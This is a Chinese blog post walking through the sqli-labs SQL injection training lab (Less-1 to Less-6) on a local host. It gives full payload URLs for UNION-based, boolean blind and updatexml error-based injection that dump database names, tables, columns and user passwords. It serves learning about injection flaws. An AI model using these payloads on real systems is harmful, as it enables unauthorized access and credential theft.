<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>sql-lib | 叶子的博客</title>
  <meta name="description" content="1.less-1">
<meta property="og:type" content="article">
<meta property="og:title" content="sql-lib">
<meta property="og:url" content="http://example.com/2022/05/23/sql-lib/index.html">
<meta property="og:site_name" content="叶子的博客">
<meta property="og:description" content="1.less-1">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-05-23T11:48:59.000Z">
<meta property="article:modified_time" content="2022-05-24T04:59:40.941Z">
<meta property="article:author" content="leaf">
<meta property="article:tag" content="sql学习">
<meta name="twitter:card" content="summary">
  <!-- Canonical links -->
  <link rel="canonical" href="http://example.com/2022/05/23/sql-lib/index.html">
  
    <link rel="alternate" href="/atom.xml" title="叶子的博客" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 6.2.0"></head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://blog.csdn.net/xiao_he0123?type=blog" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">leaf</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">时光，不会辜负每一个平静努力的人</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Shanxi, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">标签</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-有感">
          <a href="/%E6%9C%89%E6%84%9F">
            
            <i class="icon "></i>
            
            <span class="menu-title">menu.有感</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-足球">
          <a href="/%E8%AE%B0%E5%BD%95">
            
            <i class="icon "></i>
            
            <span class="menu-title">menu.足球</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-音乐">
          <a href="/music">
            
            <i class="icon "></i>
            
            <span class="menu-title">menu.音乐</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/xiao-he123" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>欢迎交流与分享经验!</p>
            </div>
        </div>
    </div>
</div>

    
      

    
      
  <div class="widget">
    <h3 class="widget-title">标签</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql%E5%AD%A6%E4%B9%A0/" rel="tag">sql学习</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签云</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/sql%E5%AD%A6%E4%B9%A0/" style="font-size: 13px;">sql学习</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">归档</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/05/">五月 2022</a><span class="archive-list-count">3</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2022/05/24/%E8%B6%B3%E7%90%83/" class="title">足球</a>
              </p>
              <p class="item-date">
                <time datetime="2022-05-24T05:24:33.000Z" itemprop="datePublished">2022-05-24</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2022/05/23/sql-lib/" class="title">sql-lib</a>
              </p>
              <p class="item-date">
                <time datetime="2022-05-23T11:48:59.000Z" itemprop="datePublished">2022-05-23</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                
              </p>
              <p class="item-title">
                <a href="/2022/05/23/hello-world/" class="title">Hello World</a>
              </p>
              <p class="item-date">
                <time datetime="2022-05-23T04:59:27.891Z" itemprop="datePublished">2022-05-23</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-sql-lib" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      sql-lib
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2022/05/23/sql-lib/" class="article-date">
	  <time datetime="2022-05-23T11:48:59.000Z" itemprop="datePublished">2022-05-23</time>
	</a>
</span>
        
        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/sql%E5%AD%A6%E4%B9%A0/" rel="tag">sql学习</a>
  </span>


        

	<span class="article-read hidden-xs">
    	<i class="icon icon-eye-fill" aria-hidden="true"></i>
    	<span id="/2022/05/23/sql-lib/" class="leancloud_visitors"  data-flag-title="sql-lib">
			<span class="leancloud-visitors-count">0</span>
		</span>
    </span>

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2022/05/23/sql-lib/#comments" class="article-comment-link">评论</a></span>
        
	
		<span class="post-wordcount hidden-xs" itemprop="wordCount">字数统计: 1.2k(字)</span>
	
	
		<span class="post-readcount hidden-xs" itemprop="timeRequired">阅读时长: 5(分)</span>
	

      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h1 id="1-less-1"><a href="#1-less-1" class="headerlink" title="1.less-1"></a>1.less-1</h1><span id="more"></span>

<p>这里是基于单引号闭合的注入</p>
<p><a target="_blank" rel="noopener" href="http://127.0.0.1/sqli-labs-master/Less-1/?id=1">http://127.0.0.1/sqli-labs-master/Less-1/?id=1</a></p>
<p>(1)添加<strong>‘</strong>:</p>
<p>返回报错信息为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#x27;&#x27;1&#x27;&#x27; LIMIT 0,1&#x27; at line 1</span><br></pre></td></tr></table></figure>

<p>这里思考一下为什么会添加单引号报错:</p>
<p>查看源码查看这里的sql语句:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;$id&#x27; LIMIT 0,1</span><br></pre></td></tr></table></figure>

<p>正常这里正常传入值后语句就变为了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select *from users where id=&#x27;1&#x27; limit 0,1</span><br></pre></td></tr></table></figure>

<p>而当我们加入**’**时就干扰了正常数据的输入</p>
<p>这里我们加一个**‘#**后语句就变为了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users where id=&#x27;1&#x27; #’ limit 0,1</span><br></pre></td></tr></table></figure>

<p>这样**#**就会省略之后的语句是该sql语句没有错误</p>
<p>所以这里我们这要在1’后面添加一些语句就可以获取到我们想要的答案</p>
<p>这里使用union查询</p>
<p>(1)确定可以回显内容的位置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,3--+</span><br></pre></td></tr></table></figure>

<p>(2)查询数据库名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,database(),3--+</span><br></pre></td></tr></table></figure>

<p>(3)查询表名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27--+</span><br></pre></td></tr></table></figure>

<p>（4）查询列名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%20%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27users%27--+</span><br></pre></td></tr></table></figure>

<p>（5）查询账号密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%20%27%20union%20select%201,username,password%20from%20users%20--+</span><br></pre></td></tr></table></figure>

<hr>
<h1 id="2-less-2"><a href="#2-less-2" class="headerlink" title="2.less-2"></a>2.less-2</h1><p>这道题是基于整型的注入</p>
<p>查看源码发现sql语句为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=$id LIMIT 0,1</span><br></pre></td></tr></table></figure>

<p>这里传入的参数没有单引号所以为整型的注入</p>
<p>这里注入的方法于less1中的方法一致</p>
<hr>
<h1 id="3-less-3"><a href="#3-less-3" class="headerlink" title="3.less-3"></a>3.less-3</h1><p>这里是基于括号的闭合注入</p>
<p>先使用之前的方法单引号闭合尝试</p>
<p>报错如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#x27;&#x27;-1&#x27;&#x27;) LIMIT 0,1&#x27; at line 1 </span><br></pre></td></tr></table></figure>

<p>发现还出现一个括号</p>
<p>查看源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=(&#x27;$id&#x27;) LIMIT 0,1</span><br></pre></td></tr></table></figure>

<p>发现这里传入参数有单引号和括号包围</p>
<p>所以这里要闭合的话就既要闭合括号还要闭合单引号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1/sqli-labs-master/Less-3/?id=-1&#x27;) union select 1,database(),3--+</span><br></pre></td></tr></table></figure>

<p>其余步骤就与之前一致</p>
<hr>
<h1 id="4-less-4"><a href="#4-less-4" class="headerlink" title="4.less-4"></a>4.less-4</h1><p>基于双引号的闭合注入</p>
<p>这里查看源码sql语句为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$id = &#x27;&quot;&#x27; . $id . &#x27;&quot;&#x27;;</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=($id) LIMIT 0,1&quot;;</span><br></pre></td></tr></table></figure>

<p>可以看到在id参数前后加上了双引号</p>
<p>为了闭合这里的双引号我们就需要自己再加上双引号就构造为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-4/?id=-1%22)%20union%20select%201,database(),3%20--+</span><br></pre></td></tr></table></figure>

<p>其余注入如上面所写一样</p>
<hr>
<h1 id="5-less-5"><a href="#5-less-5" class="headerlink" title="5.less-5"></a>5.less-5</h1><p>基于单引号的报错</p>
<p>这里页面只有正常和报错两种情况并没有回显所以这里就想到了盲注和报错注入两种注入方法</p>
<h2 id="1-盲注"><a href="#1-盲注" class="headerlink" title="(1)盲注"></a>(1)盲注</h2><p>通过**length(database()&#x3D;8)**可以得出数据库长度为8</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27%20and%20length(database())=8%20--+</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>然后对数据库每个字母进行爆破</p>
<p>这里用到了<strong>substr（）</strong></p>
<p>**substr(a,b,c)**从b开始截取a字符串c个长度</p>
<p>这里就利用这个和**ascii()**来配合</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27%20and%20ascii(substr(database(),1,1))=115--+</span><br></pre></td></tr></table></figure>

<p>当为115是返回正确所以对应便可得出数据库的第一个字母</p>
<p>然后以此类推即可获得数据库名</p>
<h2 id="（2）报错注入"><a href="#（2）报错注入" class="headerlink" title="（2）报错注入"></a>（2）报错注入</h2><p>报错注入就用到了**updatexml()**函数</p>
<p>这里updatexml用法可以看下面这位博主的文章</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_60988110/article/details/123544853">(12条消息) updatexml函数-报错注入原理学习_身高两米不到的博客-CSDN博客_updatexml报错注入</a></p>
<p>这里使用updatexml报错显示数据库名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-5/?id=-1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+</span><br></pre></td></tr></table></figure>

<p>然后爆出表名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-5/?id=-1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e),1)--+</span><br></pre></td></tr></table></figure>

<p>爆出users表中的列名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e),1)--+</span><br></pre></td></tr></table></figure>

<p>获取数据</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(username)%20from%20users),0x7e),1)--+</span><br></pre></td></tr></table></figure>



<hr>
<h1 id="6-less-6"><a href="#6-less-6" class="headerlink" title="6. less-6"></a>6. less-6</h1><p>基于双引号的盲注</p>
<p>只需要以双引号闭合即可</p>
<hr>
<h1 id="7-less-7"><a href="#7-less-7" class="headerlink" title="7.less-7"></a>7.less-7</h1>
      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>本文链接：</strong>
      <a href="http://example.com/2022/05/23/sql-lib/" title="sql-lib" target="_blank" rel="external">http://example.com/2022/05/23/sql-lib/</a>
    </li>
    
    <li class="post-copyright-license">
      <strong>版权声明： </strong> 本博客所有文章除特别声明外，均采用 <a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN协议</a> 许可协议。转载请注明出处！
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://blog.csdn.net/xiao_he0123?type=blog" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="/images/avatar.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://blog.csdn.net/xiao_he0123?type=blog" target="_blank"><span class="text-dark">leaf</span><small class="ml-1x">时光，不会辜负每一个平静努力的人</small></a></h3>
        <div></div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="vcomments"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    <li class="prev">
      <a href="/2022/05/24/%E8%B6%B3%E7%90%83/" title="足球"><i class="icon icon-angle-left" aria-hidden="true"></i><span>&nbsp;&nbsp;上一篇</span></a>
    </li>
    
    
    <li class="next">
      <a href="/2022/05/23/hello-world/" title="Hello World"><span>下一篇&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  <!-- Button trigger modal -->
  <button type="button" class="btn btn-fancy btn-donate pop-onhover bg-gradient-warning" data-toggle="modal" data-target="#donateModal"><span>赏</span></button>
  <!-- <div class="wave-icon wave-icon-danger btn-donate" data-toggle="modal" data-target="#donateModal">
    <div class="wave-circle"><span class="icon"><i class="icon icon-bill"></i></span></div>
  </div> -->
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  
<!-- Modal -->
<div class="modal modal-center modal-small modal-xs-full fade" id="donateModal" tabindex="-1" role="dialog">
  <div class="modal-dialog" role="document">
    <div class="modal-content donate">
      <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
      <div class="modal-body">
        <div class="donate-box">
          <div class="donate-head">
            <p>感谢您的支持，我会继续努力的!</p>
          </div>
          <div class="tab-content">
            <div role="tabpanel" class="tab-pane fade active in" id="alipay">
              <div class="donate-payimg">
                <img src="/images/donate/alipayimg.png" alt="扫码支持" title="扫一扫" />
              </div>
              <p class="text-muted mv">扫码打赏，你说多少就多少</p>
              <p class="text-grey">打开支付宝扫一扫，即可进行扫码打赏哦</p>
            </div>
            <div role="tabpanel" class="tab-pane fade" id="wechatpay">
              <div class="donate-payimg">
                <img src="/images/donate/wechatpayimg.png" alt="扫码支持" title="扫一扫" />
              </div>
              <p class="text-muted mv">扫码打赏，你说多少就多少</p>
              <p class="text-grey">打开微信扫一扫，即可进行扫码打赏哦</p>
            </div>
          </div>
          <div class="donate-footer">
            <ul class="nav nav-tabs nav-justified" role="tablist">
              <li role="presentation" class="active">
                <a href="#alipay" id="alipay-tab" role="tab" data-toggle="tab" aria-controls="alipay" aria-expanded="true"><i class="icon icon-alipay"></i> 支付宝</a>
              </li>
              <li role="presentation" class="">
                <a href="#wechatpay" role="tab" id="wechatpay-tab" data-toggle="tab" aria-controls="wechatpay" aria-expanded="false"><i class="icon icon-wepay"></i> 微信支付</a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>



</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/xiao-he123" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: true,
    appId: 'Lz8zxsgwwqialj51GJLN6LPX-gzGzoHsz# your leancloud application appid',
    appKey: '6fA5hUoXA0pb9LGw8zpzTWGJ# your leancloud application appkey',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: true
  });
  </script>

     







</body>
</html>